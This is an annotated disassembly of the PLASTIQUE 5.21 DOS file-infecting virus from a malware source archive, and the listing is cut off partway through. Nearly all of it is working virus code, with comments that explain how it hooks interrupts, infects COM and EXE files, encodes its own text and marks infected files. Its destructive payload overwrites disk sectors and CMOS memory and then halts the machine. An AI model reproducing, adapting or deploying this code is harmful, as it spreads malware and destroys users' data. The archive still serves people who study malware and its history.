MalwareSourceCode/MSDOS/P-Index/Virus.MSDOS.Unknown.plastiqe.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

1126 lines
42 KiB
NASM
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;---------------------------------------------------------------------------
; PLASTIQE v:5.21 Virus code
;
; Disassembled by SI-IS, 1990.10.21.
;---------------------------------------------------------------------------
Org 100
0100 E9800B JMP 0C83
0103 DW ? ;Wait counter ??
0106 DW 0,0 ;Orig INT 09 handler addres
010A DW 0,0 ;Orig INT 13 handler addres
011C DW 0 ;File handle
011E DW 0 ;File attribute
012C DB 1Ch DUP(0) ;Buffer for Exe Header
014C DW ;Ofs of file name to execute
014E DB ?
014F DB ?
0158 DW 0,0 ;New size of EXE file
015D DB ?
015E DB 'ACAD.EXE'
0166 DB 'COMMAND.COM'
0171 DB '.COM'
0175 DB '.EXE'
018B DB 'PLASTIQUE 5.21 (plastic bomb)',0D,0A
'Copyright (C) 1988-1990 by ABT Group '
'(in association with Hammer LAB.)',0D,0A
'WARNING: DON'T RUN ACAD.EXE!$'
020F DB 0 ;?
0210 DW 0 ;?
0218 DB ? ? ? ;Music Data
0321 DW 0,0 ;Orig INT 08 handler addres
;---------------------------------------------------------------------------
03E9 32C0 XOR AL,AL ;(* Critical error handler *)
03EB CF IRET
;---------------------------------------------------------------------------
03EC 2E803E4F0001 CMP CS:[004F],01 ;(* INT 08 HANDLER - TIMER *)
03F2 7431 JZ 0425
03F4 50 PUSH AX
03F5 2EA14A00 MOV AX,CS:[004A]
03F9 2E39060300 CMP CS:[0003],AX
03FE 58 POP AX
03FF 7711 JA 0412
0401 2EA05D00 MOV AL,CS:[005D]
0405 0455 ADD AL,55
0407 2EA25D00 MOV CS:[005D],AL
040B 7205 JC 0412
040D 2EFF060300 INC W/CS:[0003]
0412 51 PUSH CX
0413 2E8B0E0300 MOV CX,CS:[0003]
0418 90 NOP
0419 E2FD LOOP 0418
041B 59 POP CX
041C 2EFF2E2103 JMP Far CS:[0321] ;Jump to orig INT 08 handler
0421 A5 MOVSW
0422 FE00 INC B/[BX+SI]
0424 F0 LOCK
0425 2EFF060300 INC W/CS:[0003] ;(* MUSIC *)
042A 2E813E03000080 CMP CS:[0003],8000
0431 7702 JA 0435
0433 EBE7 JMP 041C ;Jump to orig INT 08 handler
0435 1E PUSH DS
0436 50 PUSH AX
0437 53 PUSH BX
0438 0E PUSH CS
0439 1F POP DS
043A 8B1E1001 MOV BX,[0110]
043E FE0E0F01 DEC B/[010F]
0442 7567 JNZ 04AB
0444 E461 IN AL,[61] ;Speaker OFF
0446 24FE AND AL,FE
0448 E661 OUT [61],AL
044A 8B1E1001 MOV BX,[0110]
044E FF061001 INC W/[0110]
0452 81FB8300 CMP BX,0083
0456 7503 JNZ 045B
0458 EB36 JMP 0490
045A 90 NOP
045B 8A871802 MOV AL,[BX+0218]
045F A20F01 MOV [010F],AL
0462 D1E3 SHL BX,1
0464 8B871201 MOV AX,[BX+0112]
0468 3D0000 CMP AX,0000
046B 7403 JZ 0470
046D EB0A JMP 0479
046F 90 NOP
0470 E461 IN AL,[61]
0472 24FE AND AL,FE
0474 E661 OUT [61],AL
0476 EB33 JMP 04AB
0478 90 NOP
0479 8BD8 MOV BX,AX
047B B0B6 MOV AL,B6
047D E643 OUT [43],AL ;Set Timer Chip
047F 8BC3 MOV AX,BX
0481 E642 OUT [42],AL
0483 8AC4 MOV AL,AH
0485 E642 OUT [42],AL
0487 E461 IN AL,[61] ;Speaker ON
0489 0C03 OR AL,03
048B E661 OUT [61],AL
048D EB1C JMP 04AB
048F 90 NOP
0490 E461 IN AL,[61]
0492 24FE AND AL,FE
0494 E661 OUT [61],AL
0496 C70610010000 MOV [0110],0000
049C C6060F0101 MOV [010F],01
04A1 B80080 MOV AX,8000
04A4 22260500 AND AH,[0005]
04A8 A30300 MOV [0003],AX
04AB 5B POP BX
04AC 58 POP AX
04AD 1F POP DS
04AE E96BFF JMP 041C
;---------------------------------------------------------------------------
04B1 FA CLI ;(* INT 09 HANDLER - KEYBOARD *)
04B2 50 PUSH AX
04B3 1E PUSH DS
04B4 33C0 XOR AX,AX
04B6 8ED8 MOV DS,AX
04B8 A01704 MOV AL,[0417]
04BB 1F POP DS
04BC 240C AND AL,0C
04BE 3C0C CMP AL,0C
04C0 752E JNZ 04F0
04C2 E460 IN AL,[60]
04C4 247F AND AL,7F
04C6 3C53 CMP AL,53
04C8 7526 JNZ 04F0
04CA 2E813E03000080 CMP CS:[0003],8000
04D1 721D JC 04F0
04D3 2E803E4F0001 CMP CS:[004F],01
04D9 7403 JZ 04DE
04DB EB13 JMP 04F0
04DD 90 NOP
04DE E461 IN AL,[61]
04E0 0C80 OR AL,80
04E2 E661 OUT [61],AL
04E4 247F AND AL,7F
04E6 E661 OUT [61],AL
04E8 58 POP AX
04E9 B020 MOV AL,20
04EB E620 OUT [20],AL
04ED EB0A JMP 04F9
04EF 90 NOP
04F0 58 POP AX
04F1 9C PUSHF
04F2 2EFF1E0600 CALL Far CS:[0006]
04F7 FB STI
04F8 CF IRET
;---------------------------------------------------------------------------
04F9 0E PUSH CS
04FA 58 POP AX
04FB 8ED8 MOV DS,AX
04FD 8EC0 MOV ES,AX
04FF B002 MOV AL,02
0501 E621 OUT [21],AL
0503 FB STI
0504 E461 IN AL,[61]
0506 24FE AND AL,FE
0508 E661 OUT [61],AL
050A C70610010000 MOV [0110],0000
0510 C6060F0101 MOV [010F],01
0515 C70603004C7F MOV [0003],7F4C
051B B80400 MOV AX,0004 ;Set video mode to Groph 320x200
051E CD10 INT 10 ;
0520 B8070E MOV AX,0E07 ;Write teletype - Bell
0523 CD10 INT 10
0525 BEA202 MOV SI,02A2
0528 E87300 CALL 059E
052B E87000 CALL 059E
052E E83A00 CALL 056B
0531 E83700 CALL 056B
0534 C606BA0201 MOV [02BA],01
0539 BEA202 MOV SI,02A2
053C E87E00 CALL 05BD
053F E87B00 CALL 05BD
0542 E87800 CALL 05BD
0545 E87500 CALL 05BD
0548 803EBA0201 CMP [02BA],01
054D 7402 JZ 0551
054F EBE3 JMP 0534
0551 E460 IN AL,[60]
0553 8AE0 MOV AH,AL
0555 E470 IN AL,[70]
0557 3AC4 CMP AL,AH
0559 740D JZ 0568
055B B94000 MOV CX,0040
055E 8AC1 MOV AL,CL
0560 E670 OUT [70],AL
0562 B0FF MOV AL,FF
0564 E671 OUT [71],AL
0566 E2F6 LOOP 055E
0568 F4 HLT
0569 EBFD JMP 0568
056B C60400 MOV [SI],00
056E B80102 MOV AX,0201
0571 B90100 MOV CX,0001
0574 B600 MOV DH,00
0576 8A5404 MOV DL,[SI+04]
0579 BB0010 MOV BX,1000
057C E87B00 CALL 05FA
057F 7219 JC 059A
0581 C60401 MOV [SI],01
0584 BF1800 MOV DI,0018
0587 8B8D0010 MOV CX,[DI+1000]
058B 884C01 MOV [SI+01],CL
058E BF1A00 MOV DI,001A
0591 8B8D0010 MOV CX,[DI+1000]
0595 FEC9 DEC CL
0597 884C05 MOV [SI+05],CL
059A 83C606 ADD SI,0006
059D C3 RET
059E C60400 MOV [SI],00
05A1 B408 MOV AH,08
05A3 8A5404 MOV DL,[SI+04]
05A6 E87600 CALL 061F
05A9 720E JC 05B9
05AB 887405 MOV [SI+05],DH
05AE 80E13F AND CL,3F
05B1 FEC9 DEC CL
05B3 884C01 MOV [SI+01],CL
05B6 C60401 MOV [SI],01
05B9 83C606 ADD SI,0006
05BC C3 RET
05BD BB8B00 MOV BX,008B
05C0 803C01 CMP [SI],01
05C3 752E JNZ 05F3
05C5 C606BA0200 MOV [02BA],00
05CA 8B4C02 MOV CX,[SI+02]
05CD B600 MOV DH,00
05CF 8A5404 MOV DL,[SI+04]
05D2 8A4401 MOV AL,[SI+01]
05D5 B403 MOV AH,03
05D7 E82000 CALL 05FA
05DA 7214 JC 05F0
05DC FEC6 INC DH
05DE 3A7405 CMP DH,[SI+05]
05E1 76EF JNA 05D2
05E3 80440301 ADD [SI+03],01
05E7 730A JNC 05F3
05E9 80440240 ADD [SI+02],40
05ED EB04 JMP 05F3
05EF 90 NOP
05F0 C60400 MOV [SI],00
05F3 83C606 ADD SI,0006
05F6 C3 RET
05F7 DB 00,09
05F9 DB 03
05FA C606F70400 MOV [04F7],00
05FF A3F804 MOV [04F8],AX
0602 E81A00 CALL 061F
0605 80E4C3 AND AH,C3
0608 7414 JZ 061E
060A B400 MOV AH,00
060C E81000 CALL 061F
060F A1F804 MOV AX,[04F8]
0612 FE06F704 INC B/[04F7]
0616 803EF70401 CMP [04F7],01
061B 76E5 JNA 0602
061D F9 STC
061E C3 RET
061F 9C PUSHF
0620 2EFF1E0A00 CALL Far CS:[000A]
0625 C3 RET
;---------------------------------------------------------------------------
;(* INT 13 HANDLER - DISK IO *)
0626 80FC02 CMP AH,02 ;Read sector ?
0629 751B JNZ 0646 ; No
062B F6C280 TEST DL,80 ;Hard disk <C>
062E 751A JNZ 064A ; No
0630 80FA02 CMP DL,02 ;Floppy <B>
0633 7711 JA 0646
0635 83F902 CMP CX,0002
0638 750C JNZ 0646
063A 80FE00 CMP DH,00
063D 7507 JNZ 0646
063F EB13 JMP 0654
0641 90 NOP
0642 DB 01,00
0644 DB 80,01
0646 E92001 JMP 0769
0649 DB 00
064A 80FE01 CMP DH,01
064D 75F7 JNZ 0646
064F 80FD00 CMP CH,00
0652 75F2 JNZ 0646
0654 2E803E490502 CMP CS:[0549],02
065A 7407 JZ 0663
065C 2EFE064905 INC B/CS:[0549]
0661 EBE3 JMP 0646
0663 2EC606490500 MOV CS:[0549],00
0669 2E803E5C0001 CMP CS:[005C],01
066F 74D5 JZ 0646
0671 50 PUSH AX
0672 53 PUSH BX
0673 51 PUSH CX
0674 52 PUSH DX
0675 56 PUSH SI
0676 57 PUSH DI
0677 06 PUSH ES
0678 1E PUSH DS
0679 8CC8 MOV AX,CS
067B 8ED8 MOV DS,AX
067D 8EC0 MOV ES,AX
067F 8816DF02 MOV [02DF],DL
0683 B400 MOV AH,00
0685 E897FF CALL 061F
0688 BB0010 MOV BX,1000
068B B80102 MOV AX,0201
068E B90100 MOV CX,0001
0691 B600 MOV DH,00
0693 E889FF CALL 061F
0696 7243 JC 06DB
0698 F6C280 TEST DL,80
069B 7405 JZ 06A2
069D E8CE00 CALL 076E
06A0 7239 JC 06DB
06A2 B8CB3C MOV AX,3CCB
06A5 39473E CMP [BX+3E],AX
06A8 7518 JNZ 06C2
06AA 8B4740 MOV AX,[BX+40]
06AD 3DFEFF CMP AX,FFFE
06B0 7429 JZ 06DB
06B2 2B4742 SUB AX,[BX+42]
06B5 3D0400 CMP AX,0004
06B8 7508 JNZ 06C2
06BA E8E300 CALL 07A0
06BD 7303 JNC 06C2
06BF E99F00 JMP 0761
06C2 F606DF0280 TEST [02DF],80
06C7 7415 JZ 06DE
06C9 C606E10207 MOV [02E1],07
06CE C606E20200 MOV [02E2],00
06D3 C606E00200 MOV [02E0],00
06D8 EB3F JMP 0719
06DA 90 NOP
06DB E98300 JMP 0761
06DE C606E10201 MOV [02E1],01
06E3 C606E20228 MOV [02E2],28
06E8 8A4715 MOV AL,[BX+15]
06EB 3CFC CMP AL,FC
06ED 7305 JNC 06F4
06EF C606E20250 MOV [02E2],50
06F4 A0E202 MOV AL,[02E2]
06F7 BBBB02 MOV BX,02BB
06FA B90900 MOV CX,0009
06FD 8807 MOV [BX],AL
06FF 83C304 ADD BX,0004
0702 E2F9 LOOP 06FD
0704 B80905 MOV AX,0509
0707 BBBB02 MOV BX,02BB
070A C606E00200 MOV [02E0],00
070F C606E10201 MOV [02E1],01
0714 E8AD00 CALL 07C4
0717 7248 JC 0761
0719 BB0000 MOV BX,0000
071C A1E102 MOV AX,[02E1]
071F A3440E MOV [0E44],AX
0722 A1DF02 MOV AX,[02DF]
0725 A3460E MOV [0E46],AX
0728 B80903 MOV AX,0309
072B E89600 CALL 07C4
072E 7231 JC 0761
0730 C606E10201 MOV [02E1],01
0735 C606E20200 MOV [02E2],00
073A F6C280 TEST DL,80
073D 740C JZ 074B
073F A14205 MOV AX,[0542]
0742 A3E102 MOV [02E1],AX
0745 A14405 MOV AX,[0544]
0748 A3DF02 MOV [02DF],AX
074B BE0310 MOV SI,1003
074E BF030E MOV DI,0E03
0751 B92300 MOV CX,0023
0754 90 NOP
0755 FC CLD
0756 F3A4 REP MOVSB
0758 BB000E MOV BX,0E00
075B B80103 MOV AX,0301
075E E86300 CALL 07C4
0761 1F POP DS
0762 07 POP ES
0763 5F POP DI
0764 5E POP SI
0765 5A POP DX
0766 59 POP CX
0767 5B POP BX
0768 58 POP AX
0769 2EFF2E0A00 JMP Far CS:[000A]
076E BEBE11 MOV SI,11BE
0771 B304 MOV BL,04
0773 803C80 CMP [SI],80
0776 740E JZ 0786
0778 803C00 CMP [SI],00
077B 7507 JNZ 0784
077D 83C610 ADD SI,0010
0780 FECB DEC BL
0782 75EF JNZ 0773
0784 F9 STC
0785 C3 RET
0786 8B04 MOV AX,[SI]
0788 A34405 MOV [0544],AX
078B 8B4402 MOV AX,[SI+02]
078E A34205 MOV [0542],AX
0791 8B14 MOV DX,[SI]
0793 8B4C02 MOV CX,[SI+02]
0796 B80102 MOV AX,0201
0799 BB0010 MOV BX,1000
079C E85BFE CALL 05FA
079F C3 RET
07A0 8B4740 MOV AX,[BX+40]
07A3 33D2 XOR DX,DX
07A5 F77718 DIV W/[BX+18]
07A8 FEC2 INC DL
07AA 8816E102 MOV [02E1],DL
07AE 33D2 XOR DX,DX
07B0 F7771A DIV W/[BX+1A]
07B3 8816E002 MOV [02E0],DL
07B7 A2E202 MOV [02E2],AL
07BA B80102 MOV AX,0201
07BD BB0010 MOV BX,1000
07C0 E80100 CALL 07C4
07C3 C3 RET
07C4 8B0EE102 MOV CX,[02E1]
07C8 8B16DF02 MOV DX,[02DF]
07CC E82BFE CALL 05FA
07CF C3 RET
07D0 60
07D1 1478
07D3 02
;---------------------------------------------------------------------------
07D4 9C PUSHF ;(* INT 21 HANDLER - DOS FUNC *)
07D5 3D404B CMP AX,4B40 ;AL = 40 - Invalid call
07D8 7505 JNZ 07DF
07DA B87856 MOV AX,5678 ;Detect Plastiqe ?
07DD 9D POPF
07DE CF IRET
07DF 3D414B CMP AX,4B41 ;AL = 41 - Invalid call
07E2 741E JZ 0802
07E4 3D004B CMP AX,4B00 ;AX = 4B00 - Load And Run Program
07E7 7503 JNZ 07EC
07E9 EB34 JMP 081F
07EB 90 NOP
07EC 3D003D CMP AX,3D00 ;AX = 3D00 - Open File to Read
07EF 750B JNZ 07FC
07F1 2E803E4E0001 CMP CS:[004E],01
07F7 7403 JZ 07FC
07F9 EB24 JMP 081F
07FB 90 NOP
07FC 9D POPF
07FD 2EFF2ED006 JMP Far CS:[06D0] ;Jump to orig Dos handler
0802 58 POP AX
0803 58 POP AX
0804 B80001 MOV AX,0100
0807 2EA31400 MOV CS:[0014],AX
080B 58 POP AX
080C 2EA31600 MOV CS:[0016],AX
0810 F3A4 REP MOVSB
0812 9D POPF
0813 E88003 CALL 0B96 ;Zero register
0816 8B0E2400 MOV CX,[0024]
081A 2EFF2E1400 JMP Far CS:[0014]
081F 2EC7061C00FFFF MOV CS:[001C],FFFF ;
0826 2EC70648000000 MOV CS:[0048],0000
082D 2E89161800 MOV CS:[0018],DX ;Name of file to execute
0832 2E8C1E1A00 MOV CS:[001A],DS
0837 50 PUSH AX
0838 53 PUSH BX
0839 51 PUSH CX
083A 52 PUSH DX
083B 56 PUSH SI
083C 57 PUSH DI
083D 1E PUSH DS
083E 06 PUSH ES
083F FC CLD
0840 8BF2 MOV SI,DX
0842 8A04 MOV AL,[SI] ;Convert file name to UpperCase
0844 0AC0 OR AL,AL
0846 740E JZ 0856
0848 3C61 CMP AL,61 ;'a'
084A 7207 JC 0853
084C 3C7A CMP AL,7A ;'z'
084E 7703 JA 0853
0850 802C20 SUB [SI],20
0853 46 INC SI
0854 EBEC JMP 0842
0856 2E89364C00 MOV CS:[004C],SI ;SI = ptr to End of ASCIIZ fname
085B 8BC6 MOV AX,SI
085D 0E PUSH CS
085E 07 POP ES
085F B90B00 MOV CX,000B ;Length of string
0862 2BF1 SUB SI,CX
0864 BF6600 MOV DI,0066 ;Ptr to 'COMMAND.COM' string
0867 F3A6 REP CMPSB ;File name = 'COMMAND.COM' ?
0869 7503 JNZ 086E ; No
086B E9F702 JMP 0B65 ; Yes - Exit from handler
086E 8BF0 MOV SI,AX
0870 B90800 MOV CX,0008 ;Length of string
0873 2BF1 SUB SI,CX
0875 BF5E00 MOV DI,005E ;Ptr to 'ACAD.EXE' string
0878 F3A6 REP CMPSB ;File name = 'ACAD.EXE' ?
087A 751C JNZ 0898 ; No
087C 0E PUSH CS ; Yes
087D 1F POP DS
087E 0E PUSH CS
087F 07 POP ES
0880 B409 MOV AH,09 ;Print String
0882 BA8B00 MOV DX,008B ; Virus (c) & WARNING
0885 CD21 INT 21
0887 C6064F0001 MOV [004F],01
088C C70603000080 MOV [0003],8000
0892 BEAE02 MOV SI,02AE
0895 E996FC JMP 052E ;jmp to music rutin (halt proc)
0898 B80043 MOV AX,4300 ;Get file attribute
089B CD21 INT 21
089D 7205 JC 08A4
089F 2E890E1E00 MOV CS:[001E],CX ;Save it
08A4 7271 JC 0917
08A6 32C0 XOR AL,AL
08A8 2EA22B00 MOV CS:[002B],AL
08AC 2E8B364C00 MOV SI,CS:[004C]
08B1 B90400 MOV CX,0004 ;Length of string
08B4 2BF1 SUB SI,CX
08B6 BF7100 MOV DI,0071 ;Ptr to '.COM' string
08B9 F3A6 REP CMPSB ;File extension = '.COM' ?
08BB 741C JZ 08D9 ; Yes
08BD 2EFE062B00 INC B/CS:[002B]
08C2 2E8B364C00 MOV SI,CS:[004C]
08C7 B90400 MOV CX,0004 ;Length of string
08CA 2BF1 SUB SI,CX
08CC BF7500 MOV DI,0075 ;Ptr to '.EXE' string
08CF F3A6 REP CMPSB ;File extension = '.EXE' ?
08D1 7406 JZ 08D9 ; Yes
08D3 83C1FF ADD CX,FFFF ; No
08D6 EB3F JMP 0917
08D8 90 NOP
08D9 8BFA MOV DI,DX
08DB 32D2 XOR DL,DL
08DD 807D013A CMP [DI+01],3A
08E1 7505 JNZ 08E8
08E3 8A15 MOV DL,[DI]
08E5 80E21F AND DL,1F
08E8 B436 MOV AH,36 ;Get disk free space
08EA CD21 INT 21
08EC 3DFFFF CMP AX,FFFF ; = Set carry flag
08EF 7503 JNZ 08F4
08F1 E97102 JMP 0B65
08F4 F7E3 MUL BX
08F6 F7E1 MUL CX
08F8 0BD2 OR DX,DX
08FA 7505 JNZ 0901
08FC 3D0010 CMP AX,1000 ;Available Space > 4096 ?
08FF 72F0 JC 08F1
0901 2E8B161800 MOV DX,CS:[0018]
0906 B8003D MOV AX,3D00 ;Open file to read
0909 2EC6064E0001 MOV CS:[004E],01
090F CD21 INT 21
0911 2EC6064E0000 MOV CS:[004E],00
0917 7267 JC 0980
0919 2EA31C00 MOV CS:[001C],AX
091D 8BD8 MOV BX,AX ;BX = File handle
091F B80242 MOV AX,4202 ;Set file pos to EOF
0922 B9FFFF MOV CX,FFFF
0925 BAFBFF MOV DX,FFFB
0928 CD21 INT 21
092A 7254 JC 0980
092C 050500 ADD AX,0005
092F 2EA32400 MOV CS:[0024],AX
0933 B80042 MOV AX,4200 ;Set file pos 0
0936 B90000 MOV CX,0000
0939 BA1200 MOV DX,0012
093C CD21 INT 21
093E 7240 JC 0980
0940 B90200 MOV CX,0002 ;Read 2 byte
0943 BA4600 MOV DX,0046
0946 8BFA MOV DI,DX
0948 8CC8 MOV AX,CS
094A 8ED8 MOV DS,AX
094C 8EC0 MOV ES,AX
094E B43F MOV AH,3F
0950 CD21 INT 21
0952 8B05 MOV AX,[DI]
0954 3D8919 CMP AX,1989
0957 7507 JNZ 0960
0959 B43E MOV AH,3E ;Close file
095B CD21 INT 21
095D E90502 JMP 0B65
0960 B82435 MOV AX,3524 ;Get INT 24 vector
0963 CD21 INT 21 ; (Critical error handler)
0965 891EE502 MOV [02E5],BX ;Store it
0969 8C06E702 MOV [02E7],ES
096D BAE902 MOV DX,02E9
0970 B82425 MOV AX,2524
0973 CD21 INT 21
0975 C5161800 LDS DX,[0018]
0979 33C9 XOR CX,CX
097B B80143 MOV AX,4301 ;Set file attribute
097E CD21 INT 21
0980 723B JC 09BD
0982 2E8B1E1C00 MOV BX,CS:[001C]
0987 B43E MOV AH,3E ;Close file
0989 CD21 INT 21
098B 2EC7061C00FFFF MOV CS:[001C],FFFF
0992 B8023D MOV AX,3D02 ;Open file to Write
0995 CD21 INT 21
0997 7224 JC 09BD
0999 2EA31C00 MOV CS:[001C],AX ;Store handle
099D 8CC8 MOV AX,CS
099F 8ED8 MOV DS,AX
09A1 8EC0 MOV ES,AX
09A3 8B1E1C00 MOV BX,[001C]
09A7 B80057 MOV AX,5700 ;Get file date
09AA CD21 INT 21
09AC 89162000 MOV [0020],DX ;Store it
09B0 890E2200 MOV [0022],CX
09B4 B80042 MOV AX,4200 ;Set file pos to 0
09B7 33C9 XOR CX,CX
09B9 8BD1 MOV DX,CX
09BB CD21 INT 21
09BD 725F JC 0A1E
09BF 803E2B0000 CMP [002B],00 ;File type ? 0 if .COM
09C4 7403 JZ 09C9
09C6 EB72 JMP 0A3A
09C8 90 NOP
;INFECT COM FILE ---------------
09C9 BB0010 MOV BX,1000 ;Allocate 1000h paragraphs
09CC B448 MOV AH,48
09CE CD21 INT 21
09D0 730B JNC 09DD ;Ok, mem allocated
09D2 B43E MOV AH,3E ;Error, Close file
09D4 8B1E1C00 MOV BX,[001C]
09D8 CD21 INT 21
09DA E98801 JMP 0B65 ;Exit from handler
09DD FF064800 INC W/[0048]
09E1 8EC0 MOV ES,AX ;Segment of allocated memory
09E3 33F6 XOR SI,SI
09E5 8BFE MOV DI,SI
09E7 A10300 MOV AX,[0003]
09EA 0C01 OR AL,01
09EC 813E03000080 CMP [0003],8000
09F2 7202 JC 09F6
09F4 B000 MOV AL,00
09F6 A20500 MOV [0005],AL
09F9 C6065C0001 MOV [005C],01
09FE E87201 CALL 0B73 ;DeCode text
0A01 B90010 MOV CX,1000
0A04 F3A4 REP MOVSB ;Move virus to begin of block
0A06 E86A01 CALL 0B73 ;Code text
0A09 C6065C0000 MOV [005C],00
0A0E 8BD7 MOV DX,DI ;Addr of buffer
0A10 8B0E2400 MOV CX,[0024] ;Nr Of Bytes to read
0A14 8B1E1C00 MOV BX,[001C] ;Handle
0A18 06 PUSH ES
0A19 1F POP DS
0A1A B43F MOV AH,3F ;Read from file
0A1C CD21 INT 21
0A1E 7215 JC 0A35
0A20 03F9 ADD DI,CX ;DI = New file size
0A22 7211 JC 0A35
0A24 33C9 XOR CX,CX
0A26 8BD1 MOV DX,CX
0A28 B80042 MOV AX,4200 ;Set file pos to 0
0A2B CD21 INT 21
0A2D 8BCF MOV CX,DI ;Write To File Virus + Orig code
0A2F 33D2 XOR DX,DX
0A31 B440 MOV AH,40
0A33 CD21 INT 21
0A35 720D JC 0A44
0A37 E9E600 JMP 0B20
;INFECT EXE FILES
0A3A B91C00 MOV CX,001C ;Read 1C byte from begin of file
0A3D BA2C00 MOV DX,002C
0A40 B43F MOV AH,3F
0A42 CD21 INT 21
0A44 7252 JC 0A98
0A46 813E3E008919 CMP [003E],1989 ;If INFECTED
0A4C 744A JZ 0A98 ;>> Here equal - Exit handler
0A4E C7063E008919 MOV [003E],1989
0A54 A13A00 MOV AX,[003A] ;SS
0A57 A35600 MOV [0056],AX
0A5A A13C00 MOV AX,[003C] ;SP
0A5D A35000 MOV [0050],AX
0A60 A14000 MOV AX,[0040] ;IP
0A63 A35200 MOV [0052],AX
0A66 A14200 MOV AX,[0042] ;CS
0A69 A35400 MOV [0054],AX
0A6C A13000 MOV AX,[0030]
0A6F 833E2E0000 CMP [002E],0000
0A74 7401 JZ 0A77
0A76 48 DEC AX
0A77 F7267B00 MUL W/[007B]
0A7B 03062E00 ADD AX,[002E]
0A7F 83D200 ADC DX,0000
0A82 050F00 ADD AX,000F
0A85 83D200 ADC DX,0000
0A88 25F0FF AND AX,FFF0
0A8B A35800 MOV [0058],AX
0A8E 89165A00 MOV [005A],DX
0A92 050010 ADD AX,1000
0A95 83D200 ADC DX,0000
0A98 723A JC 0AD4
0A9A F7367B00 DIV W/[007B]
0A9E 0BD2 OR DX,DX
0AA0 7401 JZ 0AA3
0AA2 40 INC AX
0AA3 A33000 MOV [0030],AX
0AA6 89162E00 MOV [002E],DX
0AAA A15800 MOV AX,[0058]
0AAD 8B165A00 MOV DX,[005A]
0AB1 F7367900 DIV W/[0079]
0AB5 2B063400 SUB AX,[0034]
0AB9 A34200 MOV [0042],AX ;NEW CS
0ABC C7064000B80B MOV [0040],0BB8 ;NEW IP
0AC2 A33A00 MOV [003A],AX ;NEW SS
0AC5 C7063C00FE0D MOV [003C],0DFE ;NEW SP
0ACB 33C9 XOR CX,CX
0ACD 8BD1 MOV DX,CX
0ACF B80042 MOV AX,4200 ;Set file pos to 0
0AD2 CD21 INT 21
0AD4 720A JC 0AE0
0AD6 B91C00 MOV CX,001C ;Write NEW Exe header
0AD9 BA2C00 MOV DX,002C
0ADC B440 MOV AH,40
0ADE CD21 INT 21
0AE0 7211 JC 0AF3
0AE2 3BC1 CMP AX,CX ;Write succesfull ?
0AE4 753A JNZ 0B20
0AE6 8B165800 MOV DX,[0058] ;Set file pos to End of Orig file
0AEA 8B0E5A00 MOV CX,[005A] ; + 0..15 (paragraph alignment)
0AEE B80042 MOV AX,4200
0AF1 CD21 INT 21
0AF3 722B JC 0B20
0AF5 A10300 MOV AX,[0003]
0AF8 0C01 OR AL,01
0AFA 813E03000080 CMP [0003],8000
0B00 7202 JC 0B04
0B02 B000 MOV AL,00
0B04 A20500 MOV [0005],AL
0B07 C6065C0001 MOV [005C],01
0B0C E86400 CALL 0B73
0B0F 33D2 XOR DX,DX
0B11 B90010 MOV CX,1000 ;Write virus to file
0B14 B440 MOV AH,40
0B16 CD21 INT 21
0B18 E85800 CALL 0B73
0B1B C6065C0000 MOV [005C],00
0B20 2E833E480000 CMP CS:[0048],0000
0B26 7404 JZ 0B2C
0B28 B449 MOV AH,49 ;Free allocated memory block
0B2A CD21 INT 21
0B2C 2E833E1C00FF CMP CS:[001C],FFFF
0B32 7431 JZ 0B65
0B34 2E8B1E1C00 MOV BX,CS:[001C]
0B39 2E8B162000 MOV DX,CS:[0020]
0B3E 2E8B0E2200 MOV CX,CS:[0022]
0B43 B80157 MOV AX,5701 ;Set file time
0B46 CD21 INT 21
0B48 B43E MOV AH,3E ;Close file
0B4A CD21 INT 21
0B4C 2EC5161800 LDS DX,CS:[0018]
0B51 2E8B0E1E00 MOV CX,CS:[001E]
0B56 B80143 MOV AX,4301 ;Set file attribute
0B59 CD21 INT 21
0B5B 2EC516E502 LDS DX,CS:[02E5]
0B60 B82425 MOV AX,2524 ;Set INT 24 to orig (Crit Err)
0B63 CD21 INT 21
0B65 07 POP ES
0B66 1F POP DS
0B67 5F POP DI
0B68 5E POP SI
0B69 5A POP DX
0B6A 59 POP CX
0B6B 5B POP BX
0B6C 58 POP AX
0B6D 9D POPF
0B6E 2EFF2ED006 JMP Far CS:[06D0]
;---------------------------------------------------------------------------
0B73 1E PUSH DS ;Decode Text
0B74 06 PUSH ES
0B75 57 PUSH DI
0B76 56 PUSH SI
0B77 51 PUSH CX
0B78 50 PUSH AX
0B79 0E PUSH CS
0B7A 07 POP ES
0B7B 0E PUSH CS
0B7C 1F POP DS
0B7D BE5E00 MOV SI,005E
0B80 8BFE MOV DI,SI
0B82 B9B100 MOV CX,00B1
0B85 8A260500 MOV AH,[0005]
0B89 AC LODSB
0B8A 32C4 XOR AL,AH
0B8C AA STOSB
0B8D E2FA LOOP 0B89
0B8F 58 POP AX
0B90 59 POP CX
0B91 5E POP SI
0B92 5F POP DI
0B93 07 POP ES
0B94 1F POP DS
0B95 C3 RET
;---------------------------------------------------------------------------
0B96 33C0 XOR AX,AX ;Zero Registers
0B98 8BD8 MOV BX,AX
0B9A 8BD0 MOV DX,AX
0B9C 8BF0 MOV SI,AX
0B9E 8BF8 MOV DI,AX
0BA0 C3 RET
;---------------------------------------------------------------------------
;Detect Speed of machine
0BA1 B400 MOV AH,00 ;Read system timer counter
0BA3 CD1A INT 1A
0BA5 8BDA MOV BX,DX ;BX=DX - Low order part of clock
0BA7 CD1A INT 1A ;Read system timer counter
0BA9 3BDA CMP BX,DX
0BAB 74FA JZ 0BA7
0BAD 33F6 XOR SI,SI
0BAF 8BDA MOV BX,DX
0BB1 CD1A INT 1A
0BB3 46 INC SI
0BB4 3BDA CMP BX,DX
0BB6 74F9 JZ 0BB1
0BB8 2EC7064A0000A0 MOV CS:[004A],A000
0BBF 8BDE MOV BX,SI
0BC1 83EB50 SUB BX,0050
0BC4 81FB000A CMP BX,0A00
0BC8 7309 JNC 0BD3
0BCA B104 MOV CL,04
0BCC D3E3 SHL BX,CL
0BCE 2E891E4A00 MOV CS:[004A],BX
0BD3 C3 RET
;---------------------------------------------------------------------------
0BD4 1E PUSH DS ;Init timer variables
0BD5 0E PUSH CS
0BD6 1F POP DS
0BD7 C6064F0000 MOV [004F],00
0BDC C6065C0000 MOV [005C],00
0BE1 E440 IN AL,[40]
0BE3 8AE0 MOV AH,AL
0BE5 E440 IN AL,[40]
0BE7 8AC4 MOV AL,AH
0BE9 2E32060500 XOR AL,CS:[0005]
0BEE 3C1F CMP AL,1F
0BF0 7205 JC 0BF7
